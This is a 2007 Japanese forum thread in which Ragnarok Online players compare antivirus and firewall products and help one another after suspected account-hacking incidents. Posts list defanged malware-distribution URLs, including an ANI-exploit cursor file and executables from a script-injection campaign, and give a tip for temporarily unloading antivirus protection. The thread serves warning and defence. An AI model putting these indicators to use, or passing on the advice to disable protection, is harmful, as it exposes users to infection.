【 ウイルススキャン結果】 やって無い
【テンプレの参考サイトを読んだか】 Yes
【hosts変更】無
【PeerGuardian2導入】無
【説明】
ウィルスバスター2006を使っていました。サポートが2007/12で切れるとの知らせが。
バスター2008 にバージョンアップしようかと思いましたが、
2008 は Windows 2000 に対応していません。
Windows 2000 に対応したセキュリティソフトのおすすめを教えて下さい。 <>
437<>sage<>07/10/31 14:07 ID:v0YIWxPF0<> ウィルスバスター2007 は重いと言う話を聞いているし、
2008/12月までしたサポートしないので
いっそ他社のソフトに乗り替えようと思っています。
今は色々なウィルス対策ソフトの体験版を順番に入れてみています。
結果
「McAfee」
ttp://www.mcafee.com/japan/mcafee/home/
ROは起動はするが、終了時に「mcsysmon.exe」がエラーで落ちてしまう。
PC自体を再起動する羽目になる。
「F-Secure Internet Security」
ttp://www.f-secure.co.jp/is/index.html
重力エラーでROが起動すらしない。FW設定を無効にしてもだめ。
Kasperskyエンジン使用との事だが…
NOD32とKasperskyが>>2 にありますが、
「F-Secure」の結果を見るに本家Kasperskyも不安な気持ちでいます。 <>
(○口○*)さん<>sage<>07/10/31 14:29 ID:aW3HqQSB0<> >>438
ROのアカハックを防ぐのが主要目的なら、カスペ一択。
NOD32はヒューリスティックで結構ひっかけるが、新種への対応がちょっと遅いので安心できん。
来月半ばで期限切れるので、カスペに乗り換えようと思ってるNOD32ユーザー談 <>
(○口○*)さん<>sage<>07/10/31 15:13 ID:PXaeP0cV0<> しかしカスペはネットの速度が落ちるという罠がある <>
(○口○*)さん<>sage<>07/10/31 15:53 ID:QcQoJ5230<> 設定次第だけどね、対策ソフト入れてる以上PCが重くなったり回線が鈍くなるのは多少仕方ないかと
最近はカスペも抜けてくる新種作られてるけど、それらに即対応できてるのもカスペだから
やっぱりカスペが一番良いと思うんだよね
その対応速度も検体提出してくださる方々の努力だったりも、ありがとうございます
なによりも一番効果があるのは「踏まないよう自身で気をつける」ことだから <>
(○口○*)さん<>sage<>07/10/31 15:56 ID:aW3HqQSB0<> カスペは体験版あるんだから、まず入れて試せという話もある <>
(○口○*)さん<>sage<>07/10/31 16:45 ID:lCgxZ/Qi0<> ウイルスは踏まないように避けるのがまず先 <>
(○口○*)さん<>sage<>07/10/31 16:59 ID:/V5KYy5p0<> >>438
F-Secureはカスペ含めた3つの検出エンジンを同時に動かしていて
重い分だけ1本で多角的な検出ができることを売りにしていたはず。 <>
(○口○*)さん<>sage<>07/10/31 20:03 ID:OH1eJ9pK0<> >>438
F-Secure使いです
他のnProtect採用してるゲームではなんとも無いので
たぶん、重力クオリティですね
パッチ画面が以前のシンプルな物から、
今の物に変わったときあたりからうまく起動しなくなりました
あまりやりたくはない方法だけど、
パッチ画面でタスクトレイのF-Secureのアイコンを右クリックで
「アンロード」→「アンロードして現在のセキュリティレベルで続行」で
一時的にF-Secureを無効にする
その後、パッチ画面からゲームを起動し、
ログイン画面表示後にまたF-Secureのアイコンを右クリック
「F-Secure製品の再ロード」でなんとか起動できます
起動後すぐに再ロードするのは絶対に忘れずに
あと、アンロード中はWEBの閲覧、メールの受信なども控えましょう
それと、モデム等で直接インターネットに繋ぐときはアンロードはやめた方がいいかも
(危険な状態を一瞬でもインターネットに晒してしまうので)
コールセンターには特に報告してません
以前、似たような問い合わせをしたら
「アンチウィルスソフトをアンインストールしてください」とか
「ルータを使用せずに直接インターネットに接続してください」って
テンプレ回答が帰ってきた
まったく、あの会社は・・・・ <>
(○口○*)さん<>sage<>07/10/31 20:11 ID:sJatLZ220<> >>445
最後のに関しては、どこも一緒よ。
要は、自分のところの製品以外はノータッチというわけで。 <>
(○口○*)さん<>sage<>07/10/31 20:45 ID:/uJT8LQo0<> >>446
開発も運営もプレーヤーのPCの設定まで知らない品
ルータの設定が何かの拍子に初期値に戻っていたりもするし
FWの設定間違えて必要なパケットまで遮断するようにしてたり
ウイルスバスターのアップデートパッチで新聞沙汰にまでなったこともある
原因を特定するためにあえて簡素なシステムにするのはサポートとして当然
自作機だって組み立てた直後は最低限の構成でテストするじゃない、それと一緒
特にネット系は、設定変えたらその内容を記録しておくことをお勧め <>
(○口○*)さん<>sage<>07/10/31 21:06 ID:ZH2CLS7T0<> 癌がテンプレ回答すべきでないことまでテンプレ回答してるせいか
テンプレ回答が悪いものであるかのように思ってる人が結構いる気がする。
PC環境なんてPCごと千差万別なんだからテンプレ回答が真っ先に来るのは当たり前。
エスパーであることを要求されるサポセンの中の人は大変だな。 <>
(○口○*)さん<>sage<>07/10/31 21:17 ID:aW3HqQSB0<> >>448の1行目が問題なだけなんだよな。 <>
(○口○*)さん<>sage<>07/10/31 21:29 ID:CIPbqvMn0<> F-Secureを使っています。うちの場合、ラグナする時には
タスクの「スパム制御」→「スパム制御を設定する」→「スパム制御無効」
にして、起動後すぐに戻してます。一応この方法もあるよってことで。
面倒だからなーもうすぐ期限来るし乗り換え検討中。 <>
(○口○*)さん<>sage<>07/10/31 21:55 ID:TnDeRgkI0<> >>440
紙みたいなファイアウォールじゃないからねぇ。
ttp://www.matousec.com/projects/windows-personal-firewall-analysis/leak-tests-results.php
設定次第だけど。
>>444
ちなみにドイツのG-DATA(ドイツではAntiVirかこれの二択)は
Kaspersky+avast!ですな。 <>
(○口○*)さん<>sage<>07/10/31 22:13 ID:e2H9alRw0<> さて、また某地方新聞社のWikiが福建人の爆撃を受けたようだ。
とりあえず罠記事の中身を削除しておいた、更新日付を変更せずに。
と言っても同一日付だが。
連中はどうも更新履歴を見ているような気がする。
福建人に改竄されたWikiを幾つか直してきた経験から”更新日付を変更しない”で修正しておいた方が良いと思う。
そうしたWikiと記事には再改竄が無いようだから。
ライブドアWikiは更新日付関連オプション無いから削除してもすぐ再改竄してくる。
このことからしても更新履歴を見ていることは間違いない。 <>
(○口○*)さん<>sage<>07/10/31 22:35 ID:e2H9alRw0<> 福建人のWiki爆撃の記事タイトル”ff11 wiki new”とか言うのは恐らく爆撃用の目印だと思われ。
所謂マーキングって奴。
あとはこれをキーワード検索、暇見て再爆撃するだけ。
これで日本語ページをぐぐったら10万件ヒットしたわ。 <>
(○口○*)さん<>sage<>07/10/31 23:00 ID:q6AdNoJ80<> ただ、サイト管理のみからすると、『更新日を変えないで編集』なんて機能は速攻OFFに
したいとこなんだよなぁ。更新日を変えないで悪さをされたら露見が遅れやばい事になる。
ま、それの重要性に気づかない程度の管理側の認識だから改竄をされ放題、って
状況なんだろうけどね。 <>
437-438<>sage<>07/11/01 00:10 ID:aI4cXMW60<> >>437-438です。皆さんいろいろアドバイスありがとうございます。
>>440
>カスペはネットの速度が落ちるという罠が
>>441
>設定次第だけどね
>対策ソフト入れてる以上PCが重くなったり
>回線が鈍くなるのは多少仕方ないかと
PCスペックはこんな物ですが、
CPU:socket478 Northwood Pentium4 3GHz
memory:2GB
回線:CATV
これでどの位遅くなるでしょう? 設定次第でどうにかなるでしょうか。
(それとも PC 新規組立?(^^;)
Kasperskyの体験版もダウンロードしたので、
そのうち試すつもりでいますが。
>>445 >>450
F-Secureでその手がありましたか。
しかしインターフェースが使いづらいので今回は遠慮しときます。
>>451
同じソフトでもフリー版と有料版でえらい差があるのに驚きました。
Outpost Firewall や ZoneAlarm とか。
今はとりあえず NOD32体験版 と X-GUARD 使用中。
さすがに PC 動作は軽快です。 <>
(○口○*)さん<>sage<>07/11/01 00:18 ID:UgwyVqda0<> X-GUARDは負荷が高いとパケットスルーするからやめた方がいい <>
(○口○*)さん<>sage<>07/11/01 00:20 ID:k9sUEj1m0<> ニコニコ動画の掲示板にも登場?
URLの中身はまだみてませんがこんなのが投下されていました。
一応名前とIDは伏せておきます
■▲▼ 【19:95】 粉→砕→☆→玉→砕→☆→大→喝→采→☆完成で
1 名前: ******** :2007/10/29(月) 18:31:19 ID:********
1日社長動画祭にする
ではスタート
88 名前: ******** :2007/10/31(水) 15:43:50 ID:********
+9武器から+10武器
その他アルティメットバトルに出現する全モンスターパターンも完全収録!
巻末にはNPCが買取りしてくれるアイテムの一覧や50音順の索引など“すぐに役立つ”インデックスを収録。
検証として各100回にわたるオーバーエンチャント実験の結果も掲載。
+9武器から+10武器ははたして100本中何本できるのか!?
その他の強化数でもn-daiとb-daiを各100枚使った実験をしてみました。
防具の強化についてもブラックミスリル製防具のOE実験も各100回ずつ検証。
興味深い結果が収録されています。
http://mbspro6uic■com/mbsplink
aguseで調べると悪質スクリプトがあるサイトでドメイン所持がChinaといういつものパターン? <>
(○口○*)さん<>sage<>07/11/01 00:46 ID:paM13kfV0<> >>452
あそこの最初の記事への爆撃を、警告文に書き換えた本人だけど。
FSWikiだから、面倒なのでrevert機能で潰している。差分表示→このバージョンに戻す、で。
admin宛にもメールで再三警告を送った方がいいのかな?
>>455
個人的な感想だけど、出来れば換装オヌヌメ。
Pen4の時点で、NetBurst暗転の罠があるからROでストレス要因になるし、win2kだからHTの恩恵も事実上受けられない。
DualCore+winxp以降なら、HT単体と違って、キャッシュ依存命令の実行待ちが減る分、バックグラウンド動作のセキュリティソフトの反応も
機敏になる。
>>457
あそこも2ch(したらば?)互換なんだよね。
専用ブラウザで閲覧設定するのが、とりあえず無難な回避策なのかも。 <>
(○口○*)さん<>sage<>07/11/01 01:08 ID:vQbQTh5j0<> >>457
あちこちばらまかれているようですね
ODNのIPからうちのBlogに同じURLが書き込まれてましたよ。
WWWCでソースをたどっていくと
http://www■mbspro6uic■com/mbsplink/mbsp.cur
最終的にこいつがが出てきて
Exploit.Win32.IMG-ANI.ac
であることが確認されました。
---------------------------------------------
Posted by : ちなみに
email :
URL : http://www■mbspro6uic■com/mbsplink
IP : 210.197.157.171
武器研究10BS
+8(82/100)
+9(17/82)
+10(13/17)
乱数の悪魔が???ポリンに食わせてきます。
http://www■mbspro6uic■com/mbsplink
----------------------------------------------- <>
(○口○*)さん<>sage<>07/11/01 04:58 ID:4HL1FYAr0<> カスペいれてみたけど
どれに許可だしたらいいのか
怪しいアドレスは踏んでいないから
グラビティフォルダは除外していいんかな <>
(○口○*)さん<>sage<>07/11/01 06:58 ID:VybhlMOo0<> >>460
そう思うなら除外すれば良い。
ここでは誰も大丈夫だという保証などはしない。
全てはPCの管理者の自己責任。
そもそも、そんなに不安なら除外や例外を指定せずにチェックするなどして
その結果から安全性の判断をすれば良いだけだと思うが? <>
(○口○*)さん<>sage<>07/11/01 07:06 ID:4HL1FYAr0<> ROを遊ぶ範囲でだ <>
(○口○*)さん<>sage<>07/11/01 07:15 ID:DMZTWuag0<> >>460
全部禁止にして、通信時に許可を求められた時を個別に許可を与える。 <>
(○口○*)さん<>sage<>07/11/01 07:16 ID:4HL1FYAr0<> >>463
そうすることにする <>
(○口○*)さん<>sage<>07/11/01 07:18 ID:l2NginHU0<> >>459
www■mbspro6uic■com/mbsplink/xiaogui.exe
先月上旬製造。 <>
(○口○*)さん<>sage<>07/11/01 07:41 ID:BIbX6TXh0<> >>458
>admin宛にもメールで再三警告を送った方がいいのかな?
何もしないよりは良いと思う、全く無関係の一般人まで巻き込むことを考えればなおさら。
Wikiに下に部署のメアドがあった、まずはそこに。
送っても対応無ければadminメアド、最後の手段はアドレスがわかるならば嫌でも見るだろうFAXで連絡とかか。 <>
(○口○*)さん<>sage<>07/11/01 11:45 ID:paM13kfV0<> 正体の掴めない、なんとも微妙なドメイン。
xrae■com
whois情報をみる限り、取得は今年7月。
何よりも、有名レンタルサーバとtypoしやすいそのドメイン名。
現状では、サイトTOPにいきなり認証ページが配してあるなど、まるで様子を窺い知れないが、まさかあるいは。 <>
(○口○*)さん<>sage<>07/11/01 16:58 ID:l2NginHU0<> ググると中華の有害サイトっぽいね。
ttp://www.google.co.jp/search?q=%22xrae.com%22 <>
(○口○*)さん<>sage<>07/11/01 22:19 ID:8wM8YJ/q0<> 【 気付いた日時 】2007 11/1 21:30ごろ
【不審なアドレスのクリックの有無 】↓以外はなし
【 アドレス 】 http://b3■spline■tv/MLGSS/?command=GRPVIEW&num=299
【 OS 】 windows XP SP2
【使用ブラウザ 】 IE6.0
【WindowsUpdateの有無】 10月の自動アップデート
【 アンチウイルスソフト 】 ウィルスバスター2007
【その他のSecurty対策 】 なし
【 ウイルススキャン結果】 ウィルスバスター・F-Secureオンラインスキャン でのスキャンでは何も見つからず。
【テンプレの参考サイトを読んだか】 No
【hosts変更】無
【PeerGuardian2導入】無
【説明】
画像貼り付け用BBSにアダルトサイトのような書き込みがあったのですが、メンバーが「垢ハックぽい。画像開いても感染するよ」
と言っていて、その前に画像を開いてしまいました。
URLを見ると 過去の投稿画像のURLと1字しか違わないのですが(最後の数字が298になっている)ギルメンの言葉が気になって・・
安全かどうか教えていただけませんでしょうか? <>
(○口○*)さん<>sage<>07/11/01 23:10 ID:DMZTWuag0<> >>469
> 安全かどうか教えていただけませんでしょうか?
>>1
>■ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ■ <>
(○口○*)さん<>sage<>07/11/01 23:14 ID:DMZTWuag0<> JWORD表示される辺りに問題があるが、アカハックではないような気がする。
きちんと調査してないので保証はしない。あと18禁は一言警告つけとけ。 <>
(○口○*)さん<>sage<>07/11/01 23:27 ID:BIbX6TXh0<> 福建人どもがWiki爆撃マーキングのほかに
検索用語としても使っているだろうキーワード群
ff11 ah wiki
ff11 wiki new
ff11 new wiki
wiki new
lineage wiki new
f11lsdflkdsfdsf
rolsfdsfdsf
一番下のは言うまでも無くROだな。 <>
469<>sage<>07/11/02 18:19 ID:v9G00A8v0<> >>470,471
指摘された点については失礼しました。18禁の警告にも全く気が回りませんでした
レスありがとうございます。 <>
(○口○*)さん<>sage<>07/11/03 03:09 ID:KAfLQeaP0<> なんかカスペオンラインシキャンがへんなことになってね? <>
(○口○*)さん<>sage<>07/11/03 07:15 ID:KAfLQeaP0<> あ、戻った
なんか言語が変なトコで固定されるようになってた <>
(○口○*)さん<>sage<>07/11/03 10:22 ID:REirbmnF0<> >>474
なんだ、その中華露店のタイトル見たいなのはw <>
(○口○*)さん<>sage<>07/11/03 12:23 ID:4tQhl3430<> >>475
一時的にスペイン語になったり繋がらなくなったりしたな。 <>
(○口○*)さん<>sage<>07/11/03 15:45 ID:pAvh4+XN0<> “セキュリティに詳しい棒グラフフェチ”の人のサイトでボコボコにされてる件 <>
(○口○*)さん<>sage<>07/11/03 19:30 ID:REirbmnF0<> >>478
そのキーワードでぐぐって最初のページのリンクを辿ったら。。。あるわ、このセキュリティホールwww <>
(○口○*)さん<>sage<>07/11/03 20:06 ID:URE3eXBH0<> ROアカウントハック報告スレのまとめサイトのhostsリストとリネのリストとの重複を除去しようとして
#クラック:暫定処置
が上下どちらを指してるか分からなくなった俺参上
southboundの方かな・・・ <>
(○口○*)さん<>sage<>07/11/03 20:24 ID:qlT+5wLL0<> 重複分はhostsRenewScript使ってで一括処理してる俺が通りますよ。
まとめサイトの人が夏以降忙しいとの事で更新されてないから
ハクスレ報告のリストをMyhostsに書いて対応してるが、漏れがありそうなのが玉に瑕。
スレのログは全部あるから、見直ししないとなぁ……
>480
暫定扱いなのは、書き換えされまくりの旅行代理店のsouthboundの方だったはず。 <>
(○口○*)さん<>sage<>07/11/03 20:35 ID:URE3eXBH0<> >>481
ありがとうございます助かりました!
ツール使わずにやろうとしたのがorz <>
(○口○*)さん<>sage<>07/11/04 00:28 ID:V7RZhPT40<> >>481
いちおうBSWikiの方で最新情報で追随して更新しているっぽなのでそちらを使っても良いかと。
ttp://smith.rowiki.jp/files/hosts.sample.gz <>
(○口○*)さん<>sage<>07/11/04 19:14 ID:lt0gQUCQ0<> FON wikiに垢ハックURLを貼り付ける馬鹿者↓
IP:211.132.151.250
USER_AGENT:"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" <>
セキュスレ1-936<>sage<>07/11/04 19:48 ID:YAE8v8oh0<> hostsRenewの作者の人です。
約半年ぶりに少々手を加えたので、Ver0.08として公開致します。
hostsRenew Version 0.08
ttp://acopri.rowiki.jp/index.php?hostsRenewScript
・■表記のhostsに対応
・タブ区切りのhostsに対応
・以前はvbsで固定していたwgetのオプションを指定可能に
・gz圧縮されたhostsに対応
これに伴い、cfgの設定項目が追加されています。
・strWGETOptの追加
・strGZIPの追加
・strGZIPOptの追加
cfgは基本的に設定不要にしております。
尚、gz圧縮されたhostsを処理する場合はgzip.exeを別途用意してください。
使用しない場合、gzip.exeは不要です。
またタスク等で自動処理されてる方はErrMsgFlgの指定に注意してください。 <>
(○口○*)さん<>sage<>07/11/05 03:21 ID:8zUqKpLx0<> >>484
wikiの中の人かい?
>z250.211-132-151.ppp.wakwak.ne.jp
なので、投稿ログ添えて通報推奨。
ttp://www.wakwak.com/support/setup/security/mail/header.html <>
(○口○*)さん<>sage<>07/11/05 14:02 ID:rsJUO0+q0<> >483
そっちは自動生成だから何らかのトラブルで壊れたファイルになっても
対応が遅れるとかで積極的には使って欲しくない、って見解だったような。
まあhostsRenewScriptも自己責任って点では同じだけど。
>485
更新乙です。
色々設定変えてみたけど、特に問題無さそうです。
初期値が以前のままなのは大人の事情なのかなぁ、と思いつつ。
それと■表記のhostsが処理出来るのは結構便利な気がした。
ギルドのサイトで危険一覧載せる時にも万が一を考えなくて済むし。 <>
(○口○*)さん<><>07/11/06 14:56 ID:yDlIpY/C0<> RO起動したらカスペが悲鳴あげたw
nProの一部が更新されたらしいw <>
(○口○*)さん<><>07/11/06 14:59 ID:yDlIpY/C0<> GameMon.desが引っかかるらしいw <>
(○口○*)さん<>sage<>07/11/06 15:08 ID:h16eAMU20<> ほぅ、8ヶ月ぶりの更新か・・・? <>
(○口○*)さん<>sage<>07/11/06 15:10 ID:RlGNAOrQ0<> アカウントハック総合対策スレから誘導されてきました。
【 アドレス 】 不明
【気付いた日時】 11月6日正午
【 OS 】 WindowsXP Home Edtion service pack2
【使用ブラウザ 】 Sleipnir 2.5.17
【WindowsUpdateの有無】 10月31日
【 アンチウイルスソフト 】 ウィルスバスター2008
【その他のSecurty対策 】 特になし?
【 ウイルススキャン結果】 ウィルスバスターでスキャン W55J0_fix_BaseSkin[1].exeというファイルが
TemporaryInternetFileというフォルダから隔離されました。
ウィルスの種類にPackerと書いてありました。
【スレログやテンプレを読んだか】 Yes
【hosts変更】なし?
【PeerGuardian2導入】 なし?
【説明】
アカハックとは全然関係ないかもしれないですが、教えてください。
上記のような状況なんですが、Packerというのが調べてみてもよくわからなくて、
ぐぐってみても何かファイルを圧縮するツールみたいな事がかいてあったんですが、
これはウィルスとは関係ないんでしょうか?
RO関係のサイトをいろいろ見ているので、アカハック等が心配で・・・。
一応念のため、パスワード等を変えようと思うのですが、一応検出したファイルは
隔離してあったので、そこからウィルスを削除をしたんですが、
このPCからパスワードを変えても平気でしょうか? <>
(○口○*)さん<>sage<>07/11/06 15:21 ID:vZbRuKQ90<> パッカー(Packer)っていうのは簡単に言えばウイルスを見つかりにくくするもの
もしかしたらまだウイルスがいるかもしれない
バスター以外のソフトでかけてみると出てくる、かも知れない
出てきたのを駆除してもまだいる、かも知れない
毎回言われてるけど完全に不安要素なくしたいならOS再インストール
垢ハックと関係あるかどうかは不明 <>
(○口○*)さん<>sage<>07/11/06 15:24 ID:PNAwlJIJ0<> ファイル名からするとなにかのスキンのようだが、ダウンロードを試みたりしなかったかい? <>
(○口○*)さん<>sage<>07/11/06 15:30 ID:K001QdPW0<> それwinamp関連のファイルじゃね <>
491<>sage<>07/11/06 15:35 ID:RlGNAOrQ0<> >>492
説明ありがとうございます!
バスター以外のソフトということでカスペルキーのオンラインスキャンをためして
みたんですが、何が原因かわからないけどできませんでした・・・。
>>493>>494
最近新しいPCを買ったばかりで、いろいろDLしたのでよくわからないですが、
確かにWINAMPは入れました。 <>
491<>sage<>07/11/06 18:12 ID:RlGNAOrQ0<> 何度もすみません。
カスペルスキーのオンラインスキャンができなかった理由がやっとわかったので
やってみたのですが、終わってみると感染はなかったようなのですが、
大量のファイル?のリストがでてきてウィルス名のところに「ロックされています」
と出ていました。これは問題はないんでしょうか?
初心者の質問ですみません・・・。 <>
(○口○*)さん<>sage<>07/11/06 18:26 ID:U48XuaxQ0<> OSが使用してたりして開けないファイル
音声ファイルとか再生してるときに削除しようとしてもできないような物
特に問題はないと思うよ <>
491<>sage<>07/11/06 19:02 ID:RlGNAOrQ0<> >>497
ありがとうございました!安心しました。 <>
(○口○*)さん<>sage<>07/11/06 19:57 ID:PNAwlJIJ0<> >>495
Winampのスキンをダウンロードし、IEのテンポラリに書き込まれた時点で
(多分)誤検知でブロックし、隔離したということじゃないかな。
Winampのスキンで垢ハックの報告例は今のところないので、可能性は薄いと思う。
安心していいんじゃない? <>
(○口○*)さん<>sage<>07/11/09 22:15 ID:5K5pCaZq0<> アカハックスレの869です。お騒がせしてすみません。
何故だか、アカハックスレへの書き込みが反映されない状態になっています。
(書き込みました。画面は出るのに、反映されていない)
ぴころだ、ベル鯖の画像は、私が上げたものです。
そのサイトをグーグルで検索した際に、表示されたものをSSで残していました。
とりあえず、こちらへの書き込みが可能かどうかの実験もかねて
書き込みさせていただきました。 <>
(○口○*)さん<>sage<>07/11/09 22:19 ID:gI2ptZly0<> NGワード(URL含む)入ってたんじゃね? <>
(○口○*)さん<>sage<>07/11/10 13:41 ID:hxx1S9Hz0<> カスペルスキーの試用版をインストールしてみたのですがROを起動しようとすると
リスクウェア「hidden object」を検知しました。と警告が出るのですが、
これは放置してもいいものでしょうか? <>
(○口○*)さん<>sage<>07/11/10 13:44 ID:9Aost0bt0<> うん。nProがチート防止のためrootkitまがいの動きをする。そんだけ。 <>
(○口○*)さん<>sage<>07/11/10 14:06 ID:rYDb8W6J0<>
|891 (^ー^*)ノ〜さん sage New! 07/11/10 12:43 ID:ebA+uPUx0
|Webサイト4万ページに不正スクリプト トルコのMSNBCも感染
|ttp://www.itmedia.co.jp/news/articles/0711/09/news019.html
|150ドメインのWebサイト4万ページ以上に不正スクリプトが埋め込まれていたことが発覚した。
|
|ttp://blog.trendmicro.com/hidden-iframes-launch-malware-en-masse/
|ttp://isc.sans.org/diary.html?storyid=3621
|
|現時点で yl18■net にアクセスできないため検体が拾えないが、
|上記SANSのVirusTotalの結果を見るといつもの中華アカウントハッカーと思われ。
一般向けの気がするので、総合スレから移動。ちょっとぐぐってみた結果
(ドメイン名そのままでぐぐると開こうとするので注意。キーワードは分割で)
下記のファイルを仕込もうとしている模様。
総合スレの人と同じく、アクセスできずに検体入手失敗。時間を置いてまた試してみよう。
http://yl18■net/0■js
http://www■yl18■net/0■html
http://www■yl18■net/1■html
http://www■yl18■net/0/0■js
http://yl18■net/1■html
http://yl18■net/z■html <>
(○口○*)さん<>sage<>07/11/10 14:08 ID:rYDb8W6J0<> >>502
ROをプレイするなら、放置or許可の方向で。
自身を隠す(Ragexe.exeをプロセスリストから隠す)動きをするのを検知して、
リスクウェア(危険なソフトが検出を免れるために行なうのと類似した挙動)だと
報告しているだけ。
リスクを承知の上で実行を許可するかどうかは、管理者(プレイヤー)の裁量次第。
勿論、許可しないとROが起動できなくなる。 <>
(○口○*)さん<>sage<>07/11/10 14:23 ID:rYDb8W6J0<> yl18■net と www■yl18■net がDNSから消えてるようだ。
記事ではまだ存在って書いてあったけど、消されたか、DNSから抹消されたかぽいな。
http://www■yl18■net/test.exe こんなのもあったらしいが、入手不可なのは残念。諦めよう。 <>
437-438,455<>sage<>07/11/10 16:00 ID:ZUKElN6e0<> 何か2007/11/06のメンテで
色々トラブルが出てるみたいですが、
中間報告めいた事を。
現在、NOD32 試用版と
ZoneAlarm( Security Suite試用版とフリー版それぞれ)
の組み合わせを試しています。
どっちも RO は(プログラムを登録すれば)起動します。
でも ZoneAlarmは Security Suite だと
タスクマネージャーのパフォーマンスが常時50%近くに。
でも体感では重いとは感じません。
フリー版に変えるとパフォーマンスはゼロ近くに軽くなりましたが、
機能がガクッと減ったし、一部のインターフェースが使いづらくなりました。
( Security Suite だと分からない用語や設定画面が多くて
私には細かい設定が出来なかったのですけど)
>>451さんのサイトでプロ版「Very good」
フリー版で「Very poor」というのもうなずけました。
フリー版でもインストールしてないよりはマシなのでしょうか?
さて最後は本命の Kaspersky 試用版を残すのみですが、
>>455のマシンスペックで動いてくれるのかどうか。
Win2000 には訳有ってすごく愛着があるので、
2010年ギリギリまで使うつもりでいるんですが… <>
437-438,455,507<><>07/11/10 16:05 ID:ZUKElN6e0<> 追記
場合によっては今のマシン(>>455)をサブにして
NOD32 + ZoneAlarm(フリーかプロかどっちに?)
それとは別に新しいメインマシンを
>>458さんのアドバイス通りに組んで
Kaspersky か…
今、サブマシンが無いからトラブルと色々困るし。(^^; <>
(○口○*)さん<>sage<>07/11/10 16:06 ID:ZUKElN6e0<> sage 忘れ失礼 orz <>
(○口○*)さん<><>07/11/10 16:56 ID:1q/BCyhC0<> NODは圧縮ファイルをスキャンしない糞仕様なんだぜw <>
(○口○*)さん<>sage<>07/11/10 21:08 ID:DunulwxAO<> 先輩方に質問。
カスペルスキーオンラインスキャンでページでエラーが発生しました。というエラー出た方います?
以前まで出来てたんですが最近このエラーによってスキャン出来なくなりました。
具体的な内容ですがオンラインスキャン実行→ActiveXダウンロード→
インストールしました。→エラーが発生。
2つの青いメーターの下の部分が100%を越えたり、
永遠とリモートファイルをダウンロードしました〜と出ます。一度アンインストールしたのですが変わらず。
解決策がありましたら御指南下さい。長文駄文失礼しました。 <>
(○口○*)さん<>sage<>07/11/10 23:34 ID:vtG9dXfz0<> >>507
ぶっちゃけ、ZoneAlameのフリー版でも入れると入れないとでは雲泥の差。
実際かなりの数のポートスキャンとかアタックとかはじいてるから割と優秀よ。
まあ、有料のや高性能高負荷のに比べれば性能は下だけど、軽さと性能のバランスはいいから個人的にはZoneAlameは好き。
まあ、どこに重きを置くかの違いだからそこは自分の用途との兼ね合いで選んでくださいな。 <>
(○口○*)さん<>sage<>07/11/11 01:05 ID:ahVmboAj0<> ProとFreeがあるFWの場合、Freeはスッカスカのが多いよ。ZAに限らんけど。
ttp://www.matousec.com/projects/windows-personal-firewall-analysis/leak-tests-results.php <>
(○口○*)さん<>sage<>07/11/11 19:44 ID:0l8nmQwm0<> スレ違いでしたらすみません。
先ほどPCを立ち上げた時、いつもならノートン先生が自動で立ち上がるのですが
今日は立ち上がらず「ウィルス防止の問題、拡張FWの問題、フィッシング対策の問題」
上記3つがどうも勝手にオフになってしまった様なのです。
解決したい項目にチェックマークがついている事を確認してから「次へ」をクリックします
と書いてあるのですが、どこにもチェックマークがなく、キャンセルボタンしか反応しません。
使用OSはVISTAでノートンは2007です。
今までこんな事態に陥った事がないのでどう対応してよいか・・・
兆候?みたいなのが昨日色々なHPを見ていた時一瞬フィッシング系監視プログラムが
無効になって、ページを一旦閉じて再び開いた時は通常通り動いていました。
普段ROを起動させているPC以外から繋いでみた所アカハックはうけていないみたい
なのですが、ノートンの状態が戻らず困っています。
宜しければ助言をお聞かせ下さい、お願いします。 <>
(○口○*)さん<>sage<>07/11/11 20:19 ID:tWMBbOng0<> アンインストールしてから再度インストール。
それでもこけるようなら、復元ポイントで戻すか、リカバリ(OS入れなおし)コース
アンインストールの時には、シマンテックのサイトにある残骸除去ツールを使用すると良い。 <>
(○口○*)さん<>sage<>07/11/11 20:42 ID:6ne7Jj7k0<> 垢ハックサイト踏んでしまったけどネット回線を切ってオフラインの作業するには大丈夫でしょうか?
OSをクリーンインストールするにしてもバックアップをとらないといけないので <>
(○口○*)さん<>sage<>07/11/11 20:48 ID:tWMBbOng0<> >>516
おk
念のため、PG2入れて、中国・韓国・台湾の送受信をブロックしてあればより安心。 <>
(○口○*)さん<>sage<>07/11/11 20:56 ID:0l8nmQwm0<> >>515さん
言われた手順を試してみたら無事戻りました
ありがとうございました^^ <>
(○口○*)さん<>sage<>07/11/12 05:12 ID:ssluFx3KO<> >>511
俺も原因不明だが出来なくなってたからカスペはずっとやってない。
ハックされたら嫌だが、直らないしネット接続しないようにしたよorz <>
(○口○*)さん<>sage<>07/11/12 07:30 ID:6jxStFmy0<> ttp://www.kaspersky.com/virusscanner/
の Online Scanner でもだめか? <>
(○口○*)さん<>sage<>07/11/13 11:20 ID:cg2xAsRb0<> >>519
プログラムの追加と削除で一回消してからもっかい行け
だめなら再インストールだね <>
(○口○*)さん<><>07/11/14 11:04 ID:aVAp1KVS0<> はーいウィンドウズアップデートですよー
ageておこう <>
(○口○*)さん<><>07/11/14 12:25 ID:NQOP0bpF0<> ttp://www.microsoft.com/japan/technet/security/bulletin/ms07-nov.mspx
緊急(1) / 重要(1)
MS07-061は、件の不正URI文字列絡み。Vista環境には無関係だが、xpには必須と言えよう。
MS07-062の方は、DNSサーバ機能に対してのfixの為、2k鯖/2k3向け。2k風呂/xp/vistaには影響無し。 <>
(○口○*)さん<>sage<>07/11/14 14:14 ID:6nl4wF4YO<> 携帯から失礼します。
質問よろしいでしょうか?
先週のメンテ以降、ログイン出来ない、プレイ中にカクカクするなどの報告が出てますよね?
自分はログイン出来るし、カクカクも無いんですが、RO終了後、ノートンがエラー(?)になり、再インストールするようにとの警告が出るようになりました。
少し前のレスにある、ノートンのサイトからアンインストールをして再インストールをするんですが、ROをプレイするとまた再インストールの警告が出ます。
何度もアンインストール→再インストールするのは手間がかかって大変なので、何か改善する方法、同じような状態の人はいませんか?
PCに詳しくないので、何か助言いただけると幸いです。 <>
(○口○*)さん<>sage<>07/11/14 14:24 ID:IN/V2MAQ0<> どちらかといえばエラースレ向きの内容な気がするが、現状推察されてる事は
nProが何か悪さしてて、それが直らない限りは症状は消えないだろう、という事。
もし可能なら、一時的にノートンをアンインストールして他のセキュリティソフトの
体験版で乗り切る、という手ぐらいしか無いと思う。
流石に一ヶ月後ぐらいには何かしら修正されてるだろうし。 <>
